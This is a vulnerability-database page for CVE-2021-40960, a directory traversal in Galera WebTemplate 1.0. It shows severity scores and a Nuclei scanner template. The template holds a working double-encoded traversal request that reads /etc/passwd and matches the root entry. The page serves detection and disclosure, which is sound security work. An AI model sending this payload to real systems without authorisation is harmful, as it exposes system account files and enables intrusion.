Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-40960
HistoryOct 01, 2021 - 2:52 p.m.

Galera WebTemplate 1.0 Directory Traversal

2021-10-0114:52:29
ProjectDiscovery
github.com
7
galera
webtemplate
directorytraversal
vulnerability
unauthorizedaccess
dataleakage
systemcompromise
securitypatches
cwe22
cvss31
lfi
cve2021

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.035

Percentile

91.6%

Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

id: CVE-2021-40960

info:
  name: Galera WebTemplate 1.0 Directory Traversal
  author: daffainfo
  severity: critical
  description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
  impact: |
    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.
  reference:
    - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
    - http://www.galera.com.tr/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-40960
    cwe-id: CWE-22
    epss-score: 0.00946
    epss-percentile: 0.81464
    cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: galera
    product: galera_webtemplate
  tags: cve2021,cve,lfi,galera

http:
  - method: GET
    path:
      - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220187c8c2301f46d23bd67d918a519d449fe550a6f1a0f86fe94bc653a088fc06a022100ad5cb9e4d174b698f3ab2139e6a5208125620d52e6a8c126cd582398026d6652:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.035

Percentile

91.6%

Related for NUCLEI:CVE-2021-40960